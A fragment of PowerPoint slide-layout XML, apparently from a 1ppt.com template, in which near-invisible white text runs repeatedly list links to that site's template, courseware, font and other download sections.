              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout240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40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40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40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4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41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41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41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41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41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41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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout241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41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41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41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4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42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42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42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42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42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42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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout242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42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42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42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4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43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43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43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43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43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43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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
